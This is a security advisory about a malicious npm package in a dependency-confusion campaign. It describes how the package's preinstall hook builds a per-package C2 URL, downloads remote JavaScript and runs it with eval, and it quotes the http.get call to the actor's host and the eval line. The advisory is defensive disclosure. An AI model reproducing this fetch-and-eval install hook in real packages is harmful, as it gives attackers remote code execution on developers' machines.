VDB
GCVE-110-OSM-2026-4740
GCVE-110-OSM-2026-4740
Advisory PublishedCVSS 9.6/10
Hijacks the developer's machine at install time by fetching and evaluating actor-controlled JavaScript from `http://scripts-loader.pulse-web-platform-core.oob.moika.tech/poc.js` via a preinstall hook, enabling unconditional remote code execution before package installation completes. The hook constructs a per-package C2 subdomain from the npm scope and package name, downloads whatever the actor serves via http.get(), and passes the response body directly to eval(). Part of the confirmed bcs-bank dependency confusion campaign; oob.moika.tech is shared C2 infrastructure across all campaign packages. Version 99.99.7 is artificially inflated.
**Trigger** (`preinstall`): executes `node preinstall.js` before package installation completes.
**C2 URL construction**: reads `process.env.npm_package_name` (set by npm to `@pulse-web-platform-core/scripts-loader`). Extracts scope (`pulse-web-platform-core`) and package name (`scripts-loader`) via string split and `/[^a-z0-9-]/gi` sanitization. Constructs URL: `http://scripts-loader.pulse-web-platform-core.oob.moika.tech/poc.js`.
**Fetch**: `http.get('http://scripts-loader.pulse-web-platform-core.oob.moika.tech/poc.js', { timeout: 8000 }, (res) => { ... })` — downloads the actor-controlled payload.
**Execution**: `try { eval(body); } catch (_) {}` — evaluates the full response body as JavaScript with access to `require`, `process.env`, file system, and network. Actor's own source comment: 'Fetches poc.js (safe PoC: whoami/hostname/ifconfig + /etc/passwd only)' — confirms the actor controls poc.js content and has tested the payload.
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | @pulse-web-platform-core/scripts-loader | 99.99.7 (affected) | — |
Browse GCVE Records
73,442 records in the GCVE database · Updated July 17, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.